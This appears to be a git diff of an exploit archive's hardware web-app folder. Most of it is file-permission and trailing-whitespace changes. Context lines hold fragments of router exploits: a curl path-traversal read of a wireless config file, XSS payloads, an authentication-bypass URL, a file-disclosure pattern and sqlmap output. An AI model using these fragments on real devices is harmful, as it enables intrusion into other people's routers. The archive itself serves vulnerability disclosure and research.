+++ b/platforms/hardware/webapps/19859.txt @@ -72,4 +72,4 @@ DYNDNS ACCOUNTS: ddns_DyndnsDynamic_hostname='hostname' //*************************************************************************************// - Special Greetz: Maztor, Zeus, Klanx, Makuaz, Alverid, zer0 z0org \ No newline at end of file + Special Greetz: Maztor, Zeus, Klanx, Makuaz, Alverid, zer0 z0org \ No newline at end of file diff --git a/platforms/hardware/webapps/20667.txt b/platforms/hardware/webapps/20667.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/20877.txt b/platforms/hardware/webapps/20877.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21032.txt b/platforms/hardware/webapps/21032.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21033.txt b/platforms/hardware/webapps/21033.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21081.txt b/platforms/hardware/webapps/21081.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21134.txt b/platforms/hardware/webapps/21134.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21395.txt b/platforms/hardware/webapps/21395.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/21992.txt b/platforms/hardware/webapps/21992.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/22005.txt b/platforms/hardware/webapps/22005.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/22493.txt b/platforms/hardware/webapps/22493.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/22549.txt b/platforms/hardware/webapps/22549.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/23250.txt b/platforms/hardware/webapps/23250.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/23498.txt b/platforms/hardware/webapps/23498.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/23499.txt b/platforms/hardware/webapps/23499.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/23572.txt b/platforms/hardware/webapps/23572.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/23995.txt b/platforms/hardware/webapps/23995.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24202.txt b/platforms/hardware/webapps/24202.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24435.txt b/platforms/hardware/webapps/24435.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24441.txt b/platforms/hardware/webapps/24441.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24442.txt b/platforms/hardware/webapps/24442.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24443.txt b/platforms/hardware/webapps/24443.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24453.txt b/platforms/hardware/webapps/24453.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24464.txt b/platforms/hardware/webapps/24464.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24466.txt b/platforms/hardware/webapps/24466.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24475.txt b/platforms/hardware/webapps/24475.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24476.txt b/platforms/hardware/webapps/24476.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24477.txt b/platforms/hardware/webapps/24477.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24478.txt b/platforms/hardware/webapps/24478.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24483.txt b/platforms/hardware/webapps/24483.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24484.txt b/platforms/hardware/webapps/24484.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24497.txt b/platforms/hardware/webapps/24497.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24498.txt b/platforms/hardware/webapps/24498.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24499.txt b/platforms/hardware/webapps/24499.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24503.txt b/platforms/hardware/webapps/24503.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24504.txt b/platforms/hardware/webapps/24504.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24513.txt b/platforms/hardware/webapps/24513.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24517.txt b/platforms/hardware/webapps/24517.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24550.txt b/platforms/hardware/webapps/24550.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24563.txt b/platforms/hardware/webapps/24563.txt old mode 100755 new mode 100644 index 37eb78b30..c4f4bb820 --- a/platforms/hardware/webapps/24563.txt +++ b/platforms/hardware/webapps/24563.txt @@ -30,4 +30,4 @@ performed by an axternal attacker who connects to the router's public IP address When an administrator in logged in the web management interface an attacker can bypass authentication and get administrator permissions connecting to the following URL: -http://<ip address>/login.cgi (where <ip address> can be both internal or public) \ No newline at end of file +http://<ip address>/login.cgi (where <ip address> can be both internal or public) \ No newline at end of file diff --git a/platforms/hardware/webapps/24740.txt b/platforms/hardware/webapps/24740.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24860.txt b/platforms/hardware/webapps/24860.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24916.txt b/platforms/hardware/webapps/24916.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24924.txt b/platforms/hardware/webapps/24924.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24926.txt b/platforms/hardware/webapps/24926.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/24928.txt b/platforms/hardware/webapps/24928.txt old mode 100755 new mode 100644 index 1e998e268..6027194b9 --- a/platforms/hardware/webapps/24928.txt +++ b/platforms/hardware/webapps/24928.txt @@ -33,4 +33,4 @@ You can easily change the default user's (admin) password by the default router ========== Save this as csrf.html and this will change the router password to blank if the current user admin visits this page his password will be resetted to blank. You can login with the username admin and password (blank). -#Greetz to G2, Zer0Freak, HR aka MrGreen, Divine, Keeper, SubZer0, zer0time, Zer0wl, Cyb_iDioT, Prominent, Raw-x, Kasper, D3ADSH0T \ No newline at end of file +#Greetz to G2, Zer0Freak, HR aka MrGreen, Divine, Keeper, SubZer0, zer0time, Zer0wl, Cyb_iDioT, Prominent, Raw-x, Kasper, D3ADSH0T \ No newline at end of file diff --git a/platforms/hardware/webapps/24975.txt b/platforms/hardware/webapps/24975.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25024.txt b/platforms/hardware/webapps/25024.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25138.txt b/platforms/hardware/webapps/25138.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25139.txt b/platforms/hardware/webapps/25139.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25142.txt b/platforms/hardware/webapps/25142.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25251.txt b/platforms/hardware/webapps/25251.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25292.txt b/platforms/hardware/webapps/25292.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25413.txt b/platforms/hardware/webapps/25413.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25416.txt b/platforms/hardware/webapps/25416.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25810.py b/platforms/hardware/webapps/25810.py index 4f9a8bc97..546041b5d 100755 --- a/platforms/hardware/webapps/25810.py +++ b/platforms/hardware/webapps/25810.py @@ -136,4 +136,4 @@ if answer=="y" or answer=="Y" : else : print W+"\n:: Bye!" -print \ No newline at end of file +print \ No newline at end of file diff --git a/platforms/hardware/webapps/25812.txt b/platforms/hardware/webapps/25812.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25813.txt b/platforms/hardware/webapps/25813.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25815.txt b/platforms/hardware/webapps/25815.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25969.txt b/platforms/hardware/webapps/25969.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25976.txt b/platforms/hardware/webapps/25976.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25978.txt b/platforms/hardware/webapps/25978.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/25998.txt b/platforms/hardware/webapps/25998.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26129.txt b/platforms/hardware/webapps/26129.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26174.txt b/platforms/hardware/webapps/26174.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26401.txt b/platforms/hardware/webapps/26401.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26415.txt b/platforms/hardware/webapps/26415.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26496.txt b/platforms/hardware/webapps/26496.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26527.txt b/platforms/hardware/webapps/26527.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26528.txt b/platforms/hardware/webapps/26528.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26664.txt b/platforms/hardware/webapps/26664.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/26736.txt b/platforms/hardware/webapps/26736.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27005.txt b/platforms/hardware/webapps/27005.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27006.txt b/platforms/hardware/webapps/27006.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27076.txt b/platforms/hardware/webapps/27076.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27177.html b/platforms/hardware/webapps/27177.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27283.txt b/platforms/hardware/webapps/27283.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27284.txt b/platforms/hardware/webapps/27284.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27286.txt b/platforms/hardware/webapps/27286.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27288.txt b/platforms/hardware/webapps/27288.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27289.txt b/platforms/hardware/webapps/27289.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27320.txt b/platforms/hardware/webapps/27320.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27402.txt b/platforms/hardware/webapps/27402.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27753.txt b/platforms/hardware/webapps/27753.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27756.txt b/platforms/hardware/webapps/27756.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/27878.txt b/platforms/hardware/webapps/27878.txt old mode 100755 new mode 100644 index 6cbfbcd7d..76d95d162 --- a/platforms/hardware/webapps/27878.txt +++ b/platforms/hardware/webapps/27878.txt @@ -28,4 +28,4 @@ if [ "$1x" != "x" ]; then curl http://$1/../etc/RT2870STA.dat exit fi -echo "Usage: $0 Nexus-543-IP" \ No newline at end of file +echo "Usage: $0 Nexus-543-IP" \ No newline at end of file diff --git a/platforms/hardware/webapps/28053.txt b/platforms/hardware/webapps/28053.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28055.txt b/platforms/hardware/webapps/28055.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28184.txt b/platforms/hardware/webapps/28184.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28239.txt b/platforms/hardware/webapps/28239.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28279.txt b/platforms/hardware/webapps/28279.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28283.txt b/platforms/hardware/webapps/28283.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28555.txt b/platforms/hardware/webapps/28555.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28562.txt b/platforms/hardware/webapps/28562.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28649.txt b/platforms/hardware/webapps/28649.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/28652.txt b/platforms/hardware/webapps/28652.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29266.txt b/platforms/hardware/webapps/29266.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29312.txt b/platforms/hardware/webapps/29312.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29516.txt b/platforms/hardware/webapps/29516.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29518.txt b/platforms/hardware/webapps/29518.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29570.txt b/platforms/hardware/webapps/29570.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29612.txt b/platforms/hardware/webapps/29612.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29673.txt b/platforms/hardware/webapps/29673.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29709.txt b/platforms/hardware/webapps/29709.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29794.txt b/platforms/hardware/webapps/29794.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29802.txt b/platforms/hardware/webapps/29802.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29924.txt b/platforms/hardware/webapps/29924.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29927.txt b/platforms/hardware/webapps/29927.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/29959.txt b/platforms/hardware/webapps/29959.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30248.txt b/platforms/hardware/webapps/30248.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30358.txt b/platforms/hardware/webapps/30358.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30361.txt b/platforms/hardware/webapps/30361.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30362.txt b/platforms/hardware/webapps/30362.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30415.txt b/platforms/hardware/webapps/30415.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30547.txt b/platforms/hardware/webapps/30547.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30665.txt b/platforms/hardware/webapps/30665.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30667.txt b/platforms/hardware/webapps/30667.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30668.txt b/platforms/hardware/webapps/30668.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30723.php b/platforms/hardware/webapps/30723.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30725.txt b/platforms/hardware/webapps/30725.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30726.txt b/platforms/hardware/webapps/30726.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30727.txt b/platforms/hardware/webapps/30727.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30900.html b/platforms/hardware/webapps/30900.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/30914.txt b/platforms/hardware/webapps/30914.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31087.txt b/platforms/hardware/webapps/31087.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31088.py b/platforms/hardware/webapps/31088.py index 0b0e94a1a..f11edca61 100755 --- a/platforms/hardware/webapps/31088.py +++ b/platforms/hardware/webapps/31088.py @@ -52,8 +52,4 @@ def main(): print "[-] Use:bluecomRT.py <ip> <password>" if __name__ == '__main__': - main() - - - - \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/hardware/webapps/31180.txt b/platforms/hardware/webapps/31180.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31261.txt b/platforms/hardware/webapps/31261.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31425.txt b/platforms/hardware/webapps/31425.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31430.txt b/platforms/hardware/webapps/31430.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31527.nse b/platforms/hardware/webapps/31527.nse old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31569.txt b/platforms/hardware/webapps/31569.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31617.txt b/platforms/hardware/webapps/31617.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31690.txt b/platforms/hardware/webapps/31690.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31764.txt b/platforms/hardware/webapps/31764.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31765.txt b/platforms/hardware/webapps/31765.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31790.txt b/platforms/hardware/webapps/31790.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31894.txt b/platforms/hardware/webapps/31894.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/31985.txt b/platforms/hardware/webapps/31985.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32161.txt b/platforms/hardware/webapps/32161.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32204.txt b/platforms/hardware/webapps/32204.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32237.txt b/platforms/hardware/webapps/32237.txt old mode 100755 new mode 100644 index 21ceea5e4..bd604327b --- a/platforms/hardware/webapps/32237.txt +++ b/platforms/hardware/webapps/32237.txt @@ -49,6 +49,4 @@ onclick=prompt(1)>XSS</button> # # More information can be found at: -http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ - - \ No newline at end of file +http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ \ No newline at end of file diff --git a/platforms/hardware/webapps/32238.txt b/platforms/hardware/webapps/32238.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32369.txt b/platforms/hardware/webapps/32369.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32385.txt b/platforms/hardware/webapps/32385.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32545.txt b/platforms/hardware/webapps/32545.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32667.pdf b/platforms/hardware/webapps/32667.pdf old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32859.txt b/platforms/hardware/webapps/32859.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32883.txt b/platforms/hardware/webapps/32883.txt old mode 100755 new mode 100644 index 6cf1d21fd..f3a3bf6d9 --- a/platforms/hardware/webapps/32883.txt +++ b/platforms/hardware/webapps/32883.txt @@ -95,11 +95,4 @@ wndr3400: 10198 for wndr3400 -****************************************************************************************************************************** - - - - - - - \ No newline at end of file +****************************************************************************************************************************** \ No newline at end of file diff --git a/platforms/hardware/webapps/32886.txt b/platforms/hardware/webapps/32886.txt old mode 100755 new mode 100644 index 6c1443f62..9d2b9713c --- a/platforms/hardware/webapps/32886.txt +++ b/platforms/hardware/webapps/32886.txt @@ -124,4 +124,4 @@ back-end DBMS: PostgreSQL [*] shutting down at 09:30:04 -bperry@ubuntu:~/tools/sqlmap$ \ No newline at end of file +bperry@ubuntu:~/tools/sqlmap$ \ No newline at end of file diff --git a/platforms/hardware/webapps/32943.txt b/platforms/hardware/webapps/32943.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/32973.txt b/platforms/hardware/webapps/32973.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33090.txt b/platforms/hardware/webapps/33090.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33129.html b/platforms/hardware/webapps/33129.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33136.txt b/platforms/hardware/webapps/33136.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33138.txt b/platforms/hardware/webapps/33138.txt old mode 100755 new mode 100644 index 6f22b77df..9dc402f4e --- a/platforms/hardware/webapps/33138.txt +++ b/platforms/hardware/webapps/33138.txt @@ -38,6 +38,4 @@ Steps to reproduce / PoC: 5. in "QoS Policy for: " Enter the following: <script>alert("XSS")</script> and click apply. 6. go to another page and navigate back into QoS - the XSS error pops up. - - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 - - \ No newline at end of file + - PoC Video: https://www.youtube.com/watch?v=xxjluF2RR70 \ No newline at end of file diff --git a/platforms/hardware/webapps/33159.txt b/platforms/hardware/webapps/33159.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33247.txt b/platforms/hardware/webapps/33247.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33248.txt b/platforms/hardware/webapps/33248.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33327.txt b/platforms/hardware/webapps/33327.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33353.txt b/platforms/hardware/webapps/33353.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33455.txt b/platforms/hardware/webapps/33455.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33518.txt b/platforms/hardware/webapps/33518.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33520.txt b/platforms/hardware/webapps/33520.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33740.txt b/platforms/hardware/webapps/33740.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33792.txt b/platforms/hardware/webapps/33792.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33803.txt b/platforms/hardware/webapps/33803.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/33866.html b/platforms/hardware/webapps/33866.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34149.txt b/platforms/hardware/webapps/34149.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34163.txt b/platforms/hardware/webapps/34163.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34187.txt b/platforms/hardware/webapps/34187.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34206.txt b/platforms/hardware/webapps/34206.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34254.txt b/platforms/hardware/webapps/34254.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34361.txt b/platforms/hardware/webapps/34361.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34583.txt b/platforms/hardware/webapps/34583.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34584.txt b/platforms/hardware/webapps/34584.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34680.txt b/platforms/hardware/webapps/34680.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34956.txt b/platforms/hardware/webapps/34956.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/34969.html b/platforms/hardware/webapps/34969.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35047.txt b/platforms/hardware/webapps/35047.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35056.txt b/platforms/hardware/webapps/35056.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35075.txt b/platforms/hardware/webapps/35075.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35128.txt b/platforms/hardware/webapps/35128.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35203.txt b/platforms/hardware/webapps/35203.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35208.txt b/platforms/hardware/webapps/35208.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35272.txt b/platforms/hardware/webapps/35272.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35276.txt b/platforms/hardware/webapps/35276.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35325.txt b/platforms/hardware/webapps/35325.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35419.txt b/platforms/hardware/webapps/35419.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35442.txt b/platforms/hardware/webapps/35442.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35462.txt b/platforms/hardware/webapps/35462.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35556.txt b/platforms/hardware/webapps/35556.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/35721.txt b/platforms/hardware/webapps/35721.txt old mode 100755 new mode 100644 index 0f9d2c739..226f2fe1a --- a/platforms/hardware/webapps/35721.txt +++ b/platforms/hardware/webapps/35721.txt @@ -125,4 +125,4 @@ http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Rout + Timeline: 2013-04-xx Send email to Movistar and Pirelli -2015-01-05 Full disclosure \ No newline at end of file +2015-01-05 Full disclosure \ No newline at end of file diff --git a/platforms/hardware/webapps/35933.txt b/platforms/hardware/webapps/35933.txt old mode 100755 new mode 100644 index 4aa3f1d9c..e5d8fede7 --- a/platforms/hardware/webapps/35933.txt +++ b/platforms/hardware/webapps/35933.txt @@ -47,6 +47,4 @@ http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseo Sobhan system Co. Signal Network And Security Group (www.signal-net.net) -E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net - - \ No newline at end of file +E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net \ No newline at end of file diff --git a/platforms/hardware/webapps/36042.txt b/platforms/hardware/webapps/36042.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/36241.txt b/platforms/hardware/webapps/36241.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/36286.txt b/platforms/hardware/webapps/36286.txt old mode 100755 new mode 100644 index 07a98bcae..7a56ca2d1 --- a/platforms/hardware/webapps/36286.txt +++ b/platforms/hardware/webapps/36286.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability would allow an attacker to obtain potentially sens DreamBox DM800 versions 1.5rc1 and prior are vulnerable. -http://www.example.com/file/?file=[LFD] \ No newline at end of file +http://www.example.com/file/?file=[LFD] \ No newline at end of file diff --git a/platforms/hardware/webapps/36865.txt b/platforms/hardware/webapps/36865.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/36978.txt b/platforms/hardware/webapps/36978.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37135.txt b/platforms/hardware/webapps/37135.txt old mode 100755 new mode 100644 index 47526d002..5b50b2814 --- a/platforms/hardware/webapps/37135.txt +++ b/platforms/hardware/webapps/37135.txt @@ -4,4 +4,4 @@ iGuard Security Access Control is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp \ No newline at end of file +http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp \ No newline at end of file diff --git a/platforms/hardware/webapps/37172.txt b/platforms/hardware/webapps/37172.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37214.txt b/platforms/hardware/webapps/37214.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37237.txt b/platforms/hardware/webapps/37237.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37238.txt b/platforms/hardware/webapps/37238.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37240.txt b/platforms/hardware/webapps/37240.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37241.txt b/platforms/hardware/webapps/37241.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37261.txt b/platforms/hardware/webapps/37261.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37298.txt b/platforms/hardware/webapps/37298.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37323.txt b/platforms/hardware/webapps/37323.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37449.txt b/platforms/hardware/webapps/37449.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37454.txt b/platforms/hardware/webapps/37454.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37516.txt b/platforms/hardware/webapps/37516.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37524.txt b/platforms/hardware/webapps/37524.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37527.txt b/platforms/hardware/webapps/37527.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37531.txt b/platforms/hardware/webapps/37531.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37532.txt b/platforms/hardware/webapps/37532.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37623.txt b/platforms/hardware/webapps/37623.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/37624.txt b/platforms/hardware/webapps/37624.txt old mode 100755 new mode 100644 diff --git 